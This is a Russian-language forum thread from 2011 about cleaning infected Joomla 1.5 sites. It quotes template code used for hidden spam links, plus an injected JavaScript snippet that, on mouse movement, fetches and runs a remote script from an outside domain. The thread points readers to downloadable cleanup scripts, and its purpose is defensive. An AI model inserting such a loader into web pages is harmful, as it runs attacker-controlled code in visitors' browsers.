Вы здесь: Home Форум
IT-К@ФЕ. Welcome! :)
   
Добро пожаловать, Гость
Логин: Пароль: Запомнить меня
Забыли пароль? Забыли логин? Регистрация

IT-К@ФЕ
Форум
Web-сайт своими руками
Security

Лечебный скрипт для сайта
(1 чел.) (1) гость
Ответить в теме
Новая тема
  • Страница:
  • 1

ТЕМА: Лечебный скрипт для сайта

Лечебный скрипт для сайта 9 мес., 3 нед. назад #2702

  • Aleksej
  • Вне сайта
  • Moderator
  • Постов: 1738
  • Репутация: 40
Весной-летом этого года (2011) по форумам рунета прокатилась волна сообщений, авторы которых душераздирающе рассказывали о заражении их сайта на J!1.5 неизвестным природе вирусом... откуда он берется, что тому виной - неумение и дырявые руки web-мастера, ворованные скрипты для сайта или некриптостойкий пароль - так и осталось "за кадром".

Известно только, на сайте (где-нить в футере) появляется куча невидимых ссылок, спрятанных в

<p style="display:none">

, а в шаблоне - вот такой код:

<!--cacheb--><?php if (defined('JOOMLA_CACHE')) { echo JOOMLA_CACHE; } ?><!--cachee-->

Ситуация не так безобидна, как может показаться; Яндекс неуклонно банит за такое, так как линки ведут всяко не на ya.ru. Поэтому - будьте осторожны! Ночью, когда силы зла властвуют безраздельно - не выходите на болото... не качайте варез - дороже станет, не присвайвайте каталогам вашего сайта три семерки напропалую... и т.д. и т.п.

А если все же не повезло и вы нашли на своем драгоценном web-ресурсе данный код и данную напасть - попробуйте воспользоваться скриптом Сергея Болотова, написанным специально для этой цели... Если помогло - можете перевести автору любую сумму на эти кошельки - ЯД 41001251003183 или R545653827015 или Z267652009871.

Инструкция по применению. Скрипт не чистит шаблон, но удаляет заразу и код в шаблоне становится пассивным. Распаковать, залить в корень av.php и запустить в браузере -

http://vash_site/av.php

Скачать скрипт
Изменено: 9 мес., 3 нед. назад от Aleksej.
Ответить Цитировать

Re: Лечебный скрипт для сайта 9 мес., 2 нед. назад #2736

  • Aleksej
  • Вне сайта
  • Moderator
  • Постов: 1738
  • Репутация: 40
Продолжаем тему удаления вирусов с сайта.
Бывает так - открываем сайт, и вдруг видим сообщение, что в той или иной строчке index.php - ошибка. Открываем злополучный файл, и где-то в конце его видим следующее:

<script type=»text/javascript» src=»https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js»></script><script type=»text/javascript»>var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript(‘http://firefoxstabs.com/’ + Math.random().toString().substring(3) + ‘.js’, function() {flag = 2;});}});});</script>


Таким образом могут быть заражены все файлы menu, index, default (php, js, html). В joomla тысячи таких файлов, так что ситуация невеселая.

Если, не дай бог, у вас приключилась подобная напасть - попробуйте воспользоваться вот этим скриптом. Распакуйте архив и поместите antivirus.php в корень сайта, а затем откройте; получите страничку с перечнем всех зараженных файлов и кнопками "лечить". После лечения - идете в этот файлик, меняете index - на menu, проделываете ту же процедуру, затем - на default.

И - скорейшего вам выздоровления!
Изменено: 9 мес., 2 нед. назад от admin.
Ответить Цитировать
Ответить в теме
Новая тема
  • Страница:
  • 1
IT-К@ФЕ
Форум
Web-сайт своими руками
Security
Время создания страницы: 0.20 секунд